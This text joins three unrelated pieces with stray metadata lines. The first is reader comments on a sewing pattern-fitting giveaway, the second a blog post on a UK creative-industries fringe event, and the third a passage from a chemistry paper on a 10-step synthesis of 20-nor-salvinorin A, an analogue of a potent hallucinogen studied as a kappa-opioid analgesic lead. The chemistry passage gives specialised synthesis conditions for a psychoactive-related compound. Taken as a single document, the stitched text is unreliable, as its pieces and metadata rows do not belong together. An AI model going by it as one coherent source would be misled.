When I was much younger, I wrote McCalls pattern company about this problem and got no real help as they suggested a woman’s pattern size that was MUCH too large (I weighed 130 then) and too short waisted (I’m 5’8″). Lord only knows what they would suggest now! I need help in the worst way! Mary R.November 24, 2015 I am overweight due to the steroids I must take to keep my illness in control. Nothing fits, including store bought clothes. Your method will surely help to solve my fitting problems. Hope you are feeling better. Have a blessed Thanksgiving. KarenNovember 24, 2015 I have a rounded upper back and a large tummy. As I’ve aged nothing fits ready to wear or pattern made. The videos were very helpful and I think the book might give me the rest of the answers. JanNovember 23, 2015 Narrow shoulders and generous hips. DeboraNovember 23, 2015 I always look forward to your emails. Thanks for the continued work you & your staff do. As you can see, you’re a blessing & inspiration to many of us here. Continued success & health to you. I want to sew for my beautiful niece, however, she is tall & hippy & I usually sew for the beanpole type grandkids. Thanks! Anne Z.November 22, 2015 Hi, I have never been formally taught how to fit patterns correctly. This information is fabulous!!! I always struggle with the bust and the arm holes. Sue VincentNovember 21, 2015 Wow this is so helpful. I learned to sew from my mom who was an amazing seamstress. I found two old dress patterns of hers and decided to make a dress for myself using them. It was hard to fit correctly because she was bustier and shorter waisted than I am. Fortunately, I was able to “make it work” and the dress was beautiful but this info would have made it much easier. Thank you. GingerNovember 21, 2015 Blending sizes some times causes my problems. EnidNovember 21, 2015 I found a pattern that I like; however, the largest size is several sizes to small for me. I would love to be able to make the adjustments. bobbie CalgaroNovember 21, 2015 Most patterns today have sleeves that are too small to fit my arm. I can’t see how they think a woman with a 40″ bust has a less than 14 1/2″ arm circumference. It’s frustrating and cutting the sleeve apart is messy and hard to work with. Donna F.November 21, 2015 Thank you, Nancy! Your pivot points were an epiphany; especially for the armscye! I will also use your method for moving the dart! I look forward to Part II! LindaC in AZNovember 21, 2015 One of my pattern puzzlers is narrow, very square shoulders. I’m so happy to see a program on fitting patterns! Thank you. AnnNovember 21, 2015 I weigh 136#. I have narrow shoulders, thin neck, but ample chest. I have loads of problems finding RTW tops and blouses that don’t have gaposis at the neck along with hanging down armpits. If I find something that fits my shoulders it is invariably too tight in the chest. I hope you will address (if any) differences in altering a knit pattern. Thx for doing a couple shows on altering patterns. 
MC O'NeillNovember 20, 2015 My copy of your fitting book from years ago is now falling apart – several pages are no longer attached to the spine. I’ve used it so much and it has never failed me. I expect the new one with the DVD will be even better! EsseNovember 20, 2015 I need help! Petite, large bust. If bust fits, armpits are huge. Ruth Ann NewnumNovember 20, 2015 This was very informative and since are ASG Group is now working with 4-Her’s this will be a very helpful video on Pattern Fitting. Thanks for your sharing and teaching us. This fitting problem has always been somewhat of a puzzle, even though I have done some alterations and that helps clear up some of the puzzle. But would really like to make a garment for myself or others and have a good fit. This book would be a great help. Cecilia FayeNovember 20, 2015 Pear-shaped–impossible to fit! Virginia O'DonnellNovember 20, 2015 As I age and shrink in heighth and expand in the tummy, I have a terrible time buying clothes and would love to make my clothes again. This method could be my answer. Being a large woman I find there are few patterns available. Mostly what I get is “lose weight”, but I have proved it’s due to real medical reasons. Still, I would like to dress nicely and make my clothes. I have to enlarge everything except a few patterns which I have to alter to fit, and it’s not always easy of successful. I would love to have the confidence to just adjust and cut out without the worry that I’d doing it right. Kim HNovember 20, 2015 I love the method you use for fitting Nancy! I is so simple and effective. I would certainly welcome this into my library. Praying for your full recovery Nancy. Hugs, Kim SusanNovember 20, 2015 As my body has changed with age I am faced with new/different fitting challenges. Thanks for the refresher course and reminder of ways to tweak the fit that I did not need to do when I was younger. SerenityNovember 20, 2015 Isn’t it amazing to see how many posts, just how many of us, no matter how much time and energy and expense we put into fitting, continue to be disappointed. Something is totally wrong. I’m hoping with this method, the mystery of fit will be resolved, once and for all. Cassy L.November 20, 2015 My body and pattern sizing has changed has changed from when I used to make all my own clothing. Would enjoy gaining confidence in choosing pattern sizes that would fit now. ReneaNovember 19, 2015 I use to make all my clothing and never had a problem of things fitting. I have just started to make some tops for myself again and they never end up fitting. Not sure what I am doing wrong or if patterns have done some size shifting. Thanks for the great giveaway. Mary WippoldNovember 19, 2015 I am short and have wide shoulders and a small bust. It is very hard to find patterns that fit. Grannie ConnieNovember 19, 2015 We are hoping you will soon be healthy. Since God “blessed” me with a generous bust, I must alter patterns to fit. I haven’t found a reliable method, but this method seems promising. I would love to win the DVD so I can finally make a blouse that fits properly. My daughter and granddaughter are ” blessed” also, so all three of us will benefit from this lesson. Thanks for all the lessons you have shared. Lori MNovember 19, 2015 My problem is finding the right waist measurement…I pick the pattern size for the bust, but then for a blouse or dress…I cannot figure out where to adjust for the waist to hip…I thank you for a great giveaway….. 
NancyNovember 19, 2015 I’m presently challenged with fitting an armhole and a short sleeve. DeborahNovember 19, 2015 On top it is solving the “hanger” area of my narrow shoulders & neck but then being able to scale out for the large bust, tummy, hips all while keeping the armscye area neat and smooth. On the bottom I’d love to get rid of smiles & frowns by perfecting the crotch length & depth… and waist…. um, where exactly is my waist?? They either stay up right under my bust or hang on my hips. My rise is then too short… teen low rise jeans come up to my belly button. I’m trying to understand that I need to pick a pattern for my high bust measurement, and then grade out for bust & hips. But so far, all my efforts have resulted in shoulder seams that fall off my shoulders, and often too wide neck openings. I’m baffled about what I should do if I just cut off the width at the shoulders – do I need to change the sleeves then? So I’m definitely puzzled. Pam KingNovember 19, 2015 I have been trying to find a pattern that really fits, I am overweight and its hard to find patterns that really fit right. Donna G.November 19, 2015 Fitting pants is my biggest puzzler! Donna SchweitzerNovember 19, 2015 I used to make my kids clothes. I have not seen me anything for years because I am a plus size and I just don’t get it! HELP! Thank you. Kelly SasmanNovember 19, 2015 I would love to learn how to fit tops in the underarm area so that the lay is right across the bust and drapes nice. ROBIN, TXNovember 19, 2015 My daughter could sure use this! TinaNovember 19, 2015 Great info. I really need this. Leanda MayerNovember 19, 2015 I have to agree with the other comments that getting older makes fitting a much more difficult job. I know how much I appreciate you tackling this problem and would love to win this. Jan N.November 19, 2015 Many years ago I learned from you the alterations you show in the Part 1 video. Now that I’m older and a “little” fluffier, I need to learn how to make an adjustment for a fuller bust line. Diane CNovember 19, 2015 I would like to make pants because the ones I buy in the stores don’t fit right Sewing is a CHALLENGE!!!! Have RA-so crooked joints-a dowager hump CHALLENGE my getting attractive & nice fitting clothes…..Nancy,you have been my fairy godmother for clothes for years…& here you come with more great help.THANKS Shirley OwensNovember 19, 2015 I can’t tell you how difficult it is for me to make any garment that has sleeves. The size of my arms are at least two sizes larger than my bodice. They are this large all the way from shoulder to wrist. I wear long sleeves to camouflage them. I am just tired of gathered sleeves. I am experienced at making my own clothes since age 10. But I am baffled by this problem. Thanks for helping so many people. I pray that God will heal you so you may keep up the good work. You are very fortunate to have so many people who love you, including me. SavannagalNovember 19, 2015 I’m a beginning sewer. I signed up for an online class on pattern fitting and I had a hard time understanding what was going on. I’m definitely interested in seeing your show on fitting. Some day it would be nice to make garments that fit well, instead of just fit on. JoanieNovember 19, 2015 I am very excited to learn a way to fit pants. I have a large waist, smaller hips, no behind and average sized legs. My problem is if I make a pant to fit my waist they are huge in the hips and legs. If I make them for my hip size then they are too small in the waist. Help!!! Thank you. 
colletteNovember 19, 2015 My fitting problem: small frame and DDD bra cup size. BonnyeNovember 19, 2015 This summer I made a dress for my son’s wedding. The size I selected was too big on the top and too small on the bottom. With the help from my husband I was able to make a beautiful dress but I would like to have a good guide for future projects. Linda swansonNovember 19, 2015 As a teen patterns fit me perfect. The years have added lots of pounds and senior shoulders and quite a large girth. I don’t even buy ready wear Jo Ann BazarNovember 19, 2015 Am I relegated to dolman sleeves forever because as I’ve aged I developed rounded shoulders and a nice set of ‘bat wings ‘ on my upper arms but stayed the same width armpit to armpit. Barbara R.November 19, 2015 I’ve stopped making clothing altogether because of the fitting problems I’ve encountered. I would love to make something besides pajama bottoms! Bev MNovember 19, 2015 I used to be able to fit myself well, but now that I am older and a little larger, I am very uncertain. I usually allow too much extra fabric. Nancy’s methods should help me a lot. Carol SNovember 19, 2015 I am totally intimated when it comes to fitting clothing and I have given up. Thank you so much for the wonderful instructions; they give me renewed hope. I hope it will be me but congratulations to whomever wins the DVD; this will be an invaluable help. MaryNovember 19, 2015 Just what I have been looking for. I have stayed away from making clothing for myself because the fit is never right. Shelia WardNovember 19, 2015 I usually have a dummy pattern cut out first using what ever paper I have on hand then I piece it onto the person I ma making the piece and do any alterations that way. Time consuming but its easier than trying to cut a semi finished piece and making mistakes that are not reversible. Linda RupeNovember 19, 2015 I have been using your methods for years and recommend them to all of my students who are afraid of making clothing because of fit issues. Thank you for providing such a straightforward way of fitting. And thank you for being so humble in your approach to sharing your knowledge. You are a blessing and inspiration to many more than you will ever know. Barbara ClintonNovember 19, 2015 I used this method many years ago, making prom dresses for my daughters. The sizing really works! I am delighted to see it again as I am interested in making some garments for myself. I had wondered if the sizing charts had changed with patten sizes. Now I have a recent version to update Nancy’s book from years ago. If you sew clothing, YOU NEED THIS! MagaNovember 19, 2015 I wish the pattern companies would write the finished garment measurements (bust, waist and hips) on the envelopes. That would at least give us a fair chance to buy the right pattern size to start with. Sometimes I have to start with a size 10 sometimes a size 14 and work from there and that is within the same company’s pattern. They don’t make it easy for us from the start. I love the method Nancy teaches in her book Pattern Fitting with Confidence. It is one very dog-eared book in my library. I look forward to watching this 2-part series very much. Mary Anne AhtyeNovember 19, 2015 I’ve been sewing since age 12 (4 H) and look forward to continuing my sewing education. Sewing with Nancy provides that outlet. By the way been sewing for 55 years still passionate about sewing! Elizabeth LewisNovember 19, 2015 What a great method! 
I am constantly on the lookout for ways to improve the fit of my garments. StarlaNovember 19, 2015 Thanks for the tips — just starting to learn to use patterns. JoyceNovember 19, 2015 When I sew, I choose the size I think I need and don’t do any alterations because I really don’t know how. If the item fits, great, if it doesn’t, I put it in the pile of scraps. I have wasted more fabric that way. I love when I get something to fit! I am sure the DVD would be a big help. NellieNovember 19, 2015 I have trouble getting patterns to fit because my bust is smaller in proportion to my waist/hips area. This can be difficult to deal with, especially when dealing with a jacket. I would love to have Nancy’s DVD to help me get through these problems. Thank you for the opportunity! eginterNovember 19, 2015 I to have fiddled my pants pattern to fit,I have lost 46 lbs so now I have to refiddle my pattern,but think I have it done,I do not like the side pockets so looked at ready to wear and figured the pocket like jeans pockets, so now I need to do a top pattern,shoulders are to big,I find if if I have a top that fits I can lay my pattern on that (as I do not have a sewing buddy)and get the pattern to fit, thanks for all the,help,have been able to use up fabric and put it to use,always makes us feel better! Sue MartinNovember 19, 2015 My number one sewing issue. This info is just what I need. Can’t wait for Part 2. Thank you Nancy. Elaine RansomNovember 19, 2015 I’ve learned over the years to make pants that fit, but still have problems with shoulder and bust fitting. Other than knits ready to wear for me is virtually non existent. This video would be a big help. AudreyNovember 19, 2015 I like to make jackets, but often have to give them away because the shoulders don’t fit. I also have trouble getting the bust fitted properly. Amy GillNovember 19, 2015 Fitting pants is tough. Choosing the correct pattern is tougher. Janet DuffNovember 19, 2015 I am finding it impossible to get my sewing patterns to fit as I get older. This book would be a huge blessing. Finding clothes that fit well and modestly in stores seems to be impossible also. I’ll have to give this a try! SuAnne RNovember 19, 2015 I used to sew most of my own garments & for my kids. Now that they are grown and my figure is no longer a ‘standard’ size, not so much. I would really like to start again and solving the fit issue would be a great help. JadeNovember 19, 2015 I’ve promised my daughter I would try to make her a jacket or two that actually fit. This book is the tool I need to get started. VirginiaNovember 19, 2015 I really need to watch this episode. Fitting issues where should I start. I have very narrow shoulders vs large bust; no longer have a definable waist, normal hips but have a tummy due to 3 surgeries. As I’ve gotten older my shoulders are now curving forward. I purchase a size L & sometimes XL depending on the fit or lack of ease and the shoulders are usually 1 to 2 inches too big. Karen B.November 19, 2015 My biggest fitting issue is around the hips and waist. I know your book will simplify and make it all make sense. Thanks, Nancy. marie hannaganNovember 19, 2015 When I was younger I no problem fitting patterns. Since getting older everything has shifted and I cannot seem to get the right fit. 
LyndaNovember 19, 2015 I would love this program, I have not sewed clothes in 20 years and I am trying to get back into it, I my daughter in law wants to learn to sew so I am teaching her and I would like her to learn the right way of doing things this DVD would really help the both of us. have a great day! MarilynNovember 19, 2015 I love dressmaking, but stopped because when my body changed, I couldn’t get a nice fit. I think I can do it with your method! I’m excited and can’t wait to see the second video. Thanks! KayZeeNovember 19, 2015 Pants fitting has always been my biggest problem. I have been watching “Sewing With Nancy” for years and have learned many helpful fitting tips. Thanks, Nancy! Linda BuckmasterNovember 19, 2015 You are a true inspiration. I have learned so much from you over the year and have many of your older shows on VHS tape. I would love to see a segment on how to adjust the crotch length of a pant pattern, to make it longer. MickieNovember 19, 2015 I used to make all my clothes, and they fit perfectly. Now I have grandchildren and nothing fits except rtw stretch and that’s stretching it a bit. With tubs of beautiful designer fabrics I hope your method is my answer. What I would give to have a pants pattern that actually fit ME. . Judy RommelNovember 19, 2015 I have a hard time with drop shoulder patterns fit and sleeve lenght alterations. CyndiNovember 19, 2015 A book with step by step instructions is Wonderful! I have sewn for years but have never taken the time to properly fit a pattern. Thank you for the give away! Debra WilliamsNovember 19, 2015 I have always been hesitant to sew anything but loose fitting garments for myself because even after 40 years sewing I’m unsure how to fit properly. This is an awesome series and thank you so much for the opportunity to win! Jan HNovember 19, 2015 Sewing clothes that fit was always a mystery. With these techniques, I’ll be willing to try again and get stellar results! EldeneNovember 19, 2015 Thanks Nancy….you make it sound so simple! Love to sew! JoNovember 19, 2015 I would really like to make clothes for summer and would definitely love to win this to keep referring back while trying to sew. ValerieNovember 19, 2015 What a great video! Grandma taught me to cut the pattern, and I’ve always been hesitant to do that. I truly appreciate these instructions and can’t wait to see Part II. Martha MorganNovember 19, 2015 I cannot get a proper fit, especially since (menopause) I went from a B cup to a double D!!! I never was a “good” seamstress but I enjoyed trying, now I make quilts. RitaNovember 19, 2015 I would love to really learn to make clothing that doesn’t’ look home made.. Martha MorganNovember 19, 2015 I cannot make clothes for myself!!! I have (since menopause) gone from a B cup to a double D, no matter what I do I cannot get a proper fit – frustrating. I never was a “good” seamstress, but I liked to keep trying, now I make quilts. KateNovember 19, 2015 I’d love this program, fitting pants is traumatizing to say the least! I pray you are doing good, and hopefully walking and feeling much better. Have a blessed day!
null
minipile
NaturalLanguage
mit
null
A blog about technology and politics Capitalism and Creativity…yeah right I stayed in the Hilton to take part in a fringe event called “The economic contribution and growth potential of the creative industries” with speakers from the CBI, UK Music and UKIE. The meeting was planned to be chaired by Tom Watson, but Sion Simon stood in for him. Matt Fell from the CBI’s competitive markets division spoke first. He started by pointing out the bleeding obvious that creative is becoming digital; except it’s not! Most musicians make more money performing than they do through licensing their content. It’s industrial music and its parasitical lawyers, agents and accountants, and now it would seem commentators, lobbyists and analysts that need copyright and the corporate industrial cocoons. He also stated that there was a lack of government backing (absolutely: look at the coalition’s abolition of the British Film Council) and he called for strong intellectual property laws. I wanted to ask how they could be stronger! Joe Dipple of UK Music spoke next and called for a moratorium on copyright law reviews, stating that further reviews would create uncertainty. She also announced that the UK was one of the top three music exporters. Interesting, I have been looking for these numbers for years. The top three countries are the USA, Sweden & the UK. I took the opportunity to ask at the end if these were net or gross exports; the researchers were unclear, and I was pointed at the BPI year book again. Is this still behind a paywall? Sion Simon made the joke that Sweden was ABBA, but it probably includes Spotify; and one should ask if a rights trading and distribution company can be called creative. During her speech she also blamed Google, and stated that they weren’t doing enough to combat piracy; obviously trying to build on some of the Labour leadership’s dislike of Google over both its tax affairs and its perceived favouring of the Tory party. Joe Twist of UKIE spoke last representing the Games industry, quickly making the point that Games and Gaming are different; one involves writing and selling software, the other is gambling. She shared some facts extolling the UK Games industry as a success: GTA V, the world’s most successful (or fastest selling) game, was written in Scotland. But she argues that the ONS statistics are not fit for purpose. Games does not show as an industry in the Standard Industrial Classification system, which means we don’t know if they are net exporters, how many people they employ, or what the GDP for the industry is. Would you swap consent for some time off the copyright protection period, currently life plus 70 years? Would you support a fair use law? I was told that creative musicians were ordinary telco customers too and they deserved this support. I didn’t get a good answer for parts 2 & 3. Not sure that the part one answer was that good. There were a bunch of questions aimed mainly at UKIE but also at UK Music about inappropriate material for young users becoming available over that there internet. Joe Twist pointed out the significant investment that the worldwide games industry has made into age guidance and censorship borrowed from the film industry. Don’t think the Music industry offers age guidance for their products.
null
minipile
NaturalLanguage
mit
null
Drug overdose has become the leading cause of death for Americans under 50, driven largely by abuse of opioids.^[@ref1]^ The number of opioid-related deaths in 2015 surpassed 33 000,^[@ref2]^ which rivaled U.S. motor vehicle fatalities (35 000);^[@ref3]^ preliminary estimates from 2016 showed the annual rate continuing to rise.^[@ref4]^ To counter this epidemic, replacement of abused opioids with alternate pain therapeutics has emerged as an increasingly sensible goal.^[@ref5]^ One alternative anti-nociceptive target under investigation is the *kappa*-opioid receptor (κ-OR), a G protein-coupled receptor (GPCR) that is expressed throughout the nervous system and modulates consciousness, cognition, mood, and pain.^[@ref6],[@ref7]^ κ-OR-targeted analgesic development has focused on chemical property modification to generate peripherally restricted κ-OR agonists that lack central nervous system (CNS)-associated effects (e.g., hallucination),^[@ref8],[@ref9]^ or that promote biased signaling to minimize βarrestin-associated effects (e.g., sedation, dysphoria).^[@ref10]^ Among the more potent and selective agonists of the κ-OR is the brain-penetrant plant metabolite salvinorin A (SalA, **1**), which was identified as the primary psychoactive principle of *Salvia divinorum* and the most potent naturally occurring hallucinogen ever discovered.^[@ref11]^ As a result, SalA has been subject to semisynthetic modification^[@ref12],[@ref13]^ and total synthesis^[@ref14]−[@ref17]^ to adjust its chemical properties and/or promote biased signaling of the κ-OR. Notably, a thiocyanate analogue of SalA, RB-64, was shown to strongly bias toward G protein-coupled signaling.^[@ref18]^ While many semisynthetic analogues of SalA have been explored, the most prolific investigators recently noted that its "chemical liabilities\...narrow the available pool of viable chemical transformations."^[@ref13]^ For example, both semisynthesis and total synthesis encounter the configurational lability of the C8 carbon, which undergoes epimerization to a lower affinity isomer, 8-*epi-*SalA (154--356-fold loss in potency).^[@ref19]^ The reaction mechanism has been hypothesized to involve either ring-fragmentation/reclosure or simple enolization/reprotonation, with the bulk of evidence pointing to the latter.^[@ref20]^ However, the driving force for this *trans*- to *cis*-ring fusion has not been identified. We believed a combination of lactone planarity and C20 axial-strain to be responsible ([Figure [1](#fig1){ref-type="fig"}](#fig1){ref-type="fig"}). Analogy can be drawn to bridgehead (C10) methyl substitution of 1-decalone, which alters its *trans:cis* equilibrium ratio from 95:5 (C10--H) to 59:41 (C10-Me), driven by relief of the Me--C3--H~ax~ 1,3-diaxial interaction in the *cis*-isomer.^[@ref21]^ In order to stabilize the scaffold and attenuate epimerization, C20 of SalA might be resected through chemical synthesis, whereas semisynthetic removal would be difficult. The effect of this modification on the chemical synthesis itself is profound. ![Chemical instability of SalA. (A) Calculation predicts and experimentation has shown that SalA is disfavored to 8-epi-SalA approximately 2.5:1. This epimerization leads to significant loss in potency. (B) We hypothesized that the driving force for this epimerization is partly diaxial repulsion between C20 and H12, which is relieved in the *cis*-fused isomer, analogous to 10-methyl-1-decalone epimerization. 
Therefore, like 1-decalone, C20 (methyl) deletion should stabilize the SalA scaffold.](oc-2017-00488d_0007){#fig1} When strategic bonds (SBs)^[@ref22],[@ref23]^ in SalA are considered, the quaternary carbon (C9) bearing the C20 methyl reveals its importance. Two SBs in SalA take priority over other possibilities through the large reduction of complexity associated with their cleavage: a C12--O lactonization transform removes a heteroatom bond, ring, and stereocenter, and a C8--9 Michael transform removes a ring and three stereocenters, leaving a simple cyclohexanone. However, strategic prioritization of the C9--10 bond ignores stereocontrol, which suffers from the small potential energy calculated to separate subtargets **i**--**iii** from stereoisomers **iv**--**vi** ([Figure [2](#fig2){ref-type="fig"}](#fig2){ref-type="fig"}). As a result of the diaxial C19/C20 methyls, **i** and **iii** only favor the desired *trans*-decalone by a slim margin, and alkyne **ii** heavily favors the *cis*-decalone **v**. Notably, the four prior total syntheses avoid decalone intermediates altogether, despite their simplicity. Furthermore, precursor **3** contains a tetrasubstituted neopentyl alkene (C9=10) in which one substituent is a quaternary carbon, which is difficult to form due to A^1,3^ strain. ![Retrosynthetic analysis of **1** using strategic bond analysis. In addition to SalA scaffold destabilization, C20 destabilizes intermediate decalones and thus deprioritizes a key strategic bond (C8--9). C20 also frustrates precursor (**3**) synthesis as a substituent on a *tert*-alkyl tetrasubstituted alkene.](oc-2017-00488d_0001){#fig2} These problems abate if the target is treated not as static but as dynamic. The C9--10 bond becomes strategic for disconnection only by resection of the C20 methyl; C9--10 can be considered a "dynamic strategic bond." Three benefits emerge. First, the intermediate *trans*-decalin (**vii**) is calculated to predominate over the *cis*-isomer (**viii**), in contrast to **i**--**iii** vs **iv**--**vi** ([Figure [3](#fig3){ref-type="fig"}](#fig3){ref-type="fig"}). Second, the unsaturated cyclohexanone precursor would arise from condensation of a β,β-disubstituted cyclohexenolate with an aldehyde instead of a methyl ketone: the latter is a challenging reaction for which we found no precedent. Third, 20-nor-SalA is calculated to be more stable than its C8-epimer, reversing the configurational preferences of SalA itself. Taken together, there is only one reason not to resect C20: 20-nor-SalA is an unknown molecule with unknown binding affinity to the κ-OR. ![Effect of C20 deletion on scaffold stability. Treatment of SalA as a dynamic structure unlocks the C9--10 strategic bond (SB) for Michael transform by C20 deletion. Both decalone intermediates and the SalA scaffold itself are stabilized. The Michael reaction precursor (shown in [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}) becomes very easy to synthesize.](oc-2017-00488d_0002){#fig3} The prospect of undertaking a total synthesis of a complex molecule for application opioid receptor pharmacology with no guaranteed target affinity was daunting. So, we first explored the binding of 20-nor-SalA to the κ-OR *in silico*. However, the recent crystal structure of a κ-OR with antagonist JDTic^[@ref6]^ reflects an inactive state conformation of the binding pocket, specific to JDTic, and therefore is not well suited for binding of agonist SalA or its analogues. 
Therefore, we developed an active-like model of the κ-OR by using homology modeling based on an active state agonist-bound crystal structure of the mu-opioid receptor (μ-OR) (PDB ID: 5c1m). Receptor modeling included thorough sampling and optimization of the binding pocket side chains. The resulting active-like κ-OR receptor model was used to dock SalA and 20-nor-SalA using an all-atom global energy optimization algorithm, based on Monte Carlo sampling of the ligand and residue side chains within 4 Å of the ligand.^[@ref24]^ In the predicted docking models SalA and 20-nor-SalA bind in similar poses and with comparable binding scores (−28.76 and −27.42, respectively). In this binding pose 20-nor-SalA forms polar interactions with Q115^2.60^, Y312^7.35^, and C210^ECL2^ residues and, potentially, with N122^ECL1^ and/or R202^ECL2^ residues. The ligands also make extensive hydrophobic interactions with residues lining transmembrane 2, 3, and 7 including V118^2.63^, W124^ECL1^, I135^3.29^, and I316^7.39^ residues. This pose also satisfies the ligand interaction contacts derived from mutagenesis data for SalA.^[@ref25]^ In this pose, the 20-methyl group is directed toward the extracellular region with no apparent interactions with the receptor. This binding pose suggested comparable binding affinity for SalA and its 20-nor derivative. ![Calculated binding to the κ-OR. Docking mode of ligands 20-nor-SalA (orange) and SalA (green), shown in stick representations inside the kappa opioid receptor model (white colored cartoon representation). Residues in the ligand vicinity are shown in white-colored stick representation, and associated hydrogen bonds are shown in cyan colored dots.](oc-2017-00488d_0003){#fig4} These calculations provided a theoretical basis for investigation; justification for total synthesis usually depends on experimentally observed activity. However, knowledge of κ-OR affinity in this case required synthesis---a catch-22. A study to probe structure--activity relationships in SalA could not reach the nor-20 target,^[@ref26]^ so no empirical data was available. Nevertheless, we felt the potential benefits for therapeutic development outweighed the risk. Furthermore, the simplification imparted by C20 resection significantly improved material access by unlocking the C9--10 bond, whereas prior syntheses of SalA produced only small amounts of late-stage material over multiple operations (20--29 steps; 0.7--1% yield).^[@ref14]−[@ref17]^ Shown in [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"} is a 10-step synthesis of 20-nor-SalA. ![Chemical synthesis of 20-nor-salvinorin A. (A) Commercially available materials **4** and **5** are advanced in 10 steps to 20-nor-1 via diversifiable scaffold **11**, which is accessed in 7% overall yield. (B) Confirmed and hypothesized intermediates in the Michael (**8** → **9**), Heck (**11** → **12**), and lactonization (**12** → 20-nor-**1**) steps. 
TBS, *tert*-butyldimethylsilyl; DMS, dimethylsulfide; THF, tetrahydrofuran; HMPA, hexamethylphosphoramide; MsCl, methanesulfonyl chloride; DBU, 1,8-diazabicyclo(5.4.0)undec-7-ene; DMSO, dimethyl sulfoxide; LDA, lithium diisopropylamide; DMAP, 4-dimethylaminopyridine; XPhos, 2-dicyclohexylphosphino-2′,4′,6′-triisopropylbiphenyl; DMF, *N*,*N*-dimethylformamide.](oc-2017-00488d_0004){#fig5} The synthesis commenced from Hagemann's ester (**4**), a commercially available building block common in terpene synthesis,^[@ref27]^ which appeared to be an obvious precursor to 20-nor-SalA via vicinal difunctionalization. Grignard reagent **5** was generated from commercially available *tert*-butyl(4-chlorobutoxy)dimethylsilane and used directly. However, early experiments to trap the sterically encumbered enolates resulting from conjugate addition proved fruitless, even with the simplest electrophiles like acetaldehyde. Enolate transmetalation with diethylzinc allowed enol silane formation and Mukaiyama aldol addition,^[@ref28]^ but always in low yield and never with electron-rich aldehydes. Instead, we found that addition of zinc chloride^[@ref29],[@ref30]^ and five equivalents of acrolein resulted in efficient formation of **6** as an inconsequential 6:1 mixture of allylic alcohols. Elimination of this alcohol was effected by mesylation, followed by ketone enolization by addition of DBU. These conditions initially delivered a mixture of (*E*)- and (*Z*)-dienones, but isomerization mediated by reversible DBU addition occurred with prolonged reaction time to favor (*E*)-**7** with 20:1 selectivity. Subsequent steps for elaboration to 20-nor-**1** involved careful choreography of (1) cyclization, (2) α-acetoxylation, (3) aryl appendage, and (4) lactonization steps, based on extensive reconnaissance briefly discussed here. An initial Heck arylation of **7** with 3-bromofuran or its boronic esters proved low yielding, and δ-(3-furyl)-substitution lowered the electrophilicity of the dienone toward nucleophiles. Several ketone α-hydroxylations competitively oxidized the furan ring if present, and Hagiwara's conditions for acetate installation by Mitsunobu stereoinversion^[@ref15]^ were inefficient and required purification from 20 equiv of PPh~3~ and 10 equiv of diisopropyl azodicarboxylate. The aldehyde oxidation state, not the carboxylic acid, was chosen to engage in Michael addition due to its ease of enolization (or enamine formation) in the presence of the two other enolizable carbonyls. As a result, the final sequence involved *tert*-butyldimethylsilyl removal with 2 M HCl, followed by Swern oxidation of the deprotected alcohol to aldehyde **8**. Intramolecular Michael addition was carried out from the corresponding pyrrolidine enamine in methanol/tetrahydrofuran with added acetic acid. As the alcoholic cosolvent increased in size, the ratio of *trans-* and *cis-*decalone (see [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B) increasingly favored the undesired *cis-*decalin. Quench by potassium carbonate served to equilibrate an initially low ratio of *trans-/cis-*decalones to predominantly one isomer **9** (*cis-*decalone lower than 5% content by crude ^1^H NMR), which contained the contiguous stereopentad found in the salvinorin A scaffold. Substitution of methanol cosolvent with ethanol resulted in a dramatically slower equilibration.
Pinnick oxidation of aldehyde **9** capped a facile route to diversifiable carboxylic acid (**10**, X-ray confirmation), which was successfully scaled to 5.3 g in a single pass. After much experimentation, we found only four steps to separate **10** from 20-nor-SalA, affording a convenient platform for eventual diversification to alter the chemical properties of the SalA chemotype. The first two of these steps address appendage of the equatorial acetate, which is challenged by the high selectivity for axial approach of electrophiles,^[@ref16]^ the difficulty of S~N~2 stereoinversion of these axial α-hydroxy and α-bromo cyclohexanones, and the high oxidation potential of furanyl intermediates. In some cases, α-debromination by acetate outcompeted substitution. These problems were solved by deprotonation of **10** with 2.1 equiv of LDA followed by Davis oxaziridine^[@ref31]^ addition, which generated in high diastereoselectivity the axial α-hydroxy-decalone. Subsequent acetylization occurred at both the alcohol and the carboxylic acid; warming this reaction mixture led to equilibration to favor the equatorial acetate without affecting the stereochemistry at any other position. Careful aqueous workup was performed to decompose the mixed anhydride at high pH and recover the carboxylic acid at low pH, while sparing the acetate from cleavage during these operations. The carboxylic acid itself was found to be crucial for the Heck arylation with 3-bromofuran. Early experiments to arylate the electronically unbiased olefin of aldehyde **9** surveyed a range of palladium sources, oxidants, ligands, solvents, and bases, under both oxidative^[@ref32]^ and traditional Heck conditions with little success. The optimal results in these early versions of the synthesis required 10 portion-wise additions of palladium(II) acetate, 3-furanylboronic acid, and a bifluoride source. Ultimately, the yield, reproducibility, and enthusiasm for this intensive procedure were low. Fortunately, we discovered that carboxylic acids **10** or **11** (in contrast to aldehyde **9**) underwent very efficient Heck arylation as their alkali salts: the potassium carboxylate provided the highest yields of **12** and XPhos ligands promoted the highest rates and catalyst turnovers. The superiority of carboxylic acids to the corresponding aldehyde may derive from accelerated coordination/migratory insertion by initial coordination of the 3-furyl-palladium(II) by the potassium carboxylate ([Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B). Analogy can be drawn to classic proximity effects^[@ref33]^ recently brought to bear on palladium catalysis using carboxylic acids.^[@ref34]^ To the best of our knowledge, the closest precedent in the Heck reaction of haloarenes^[@ref35]^ involves the accelerated arylation of unsaturated primary amides compared to their corresponding phthalimides.^[@ref36]^ The final obstacle to 20-nor-**1** required lactonization of the carboxylic acid onto an electron-rich conjugated alkene with Markovnikov regioselectivity and equatorial stereoselectivity---on its face an uncomplicated scenario. We were dismayed to discover that subjection of **12** to a variety of strong Brønsted acids led to furan decomposition at rates competitive with lactonization, and what little lactones could be recovered were equimolar mixtures of diastereomers at C12. 
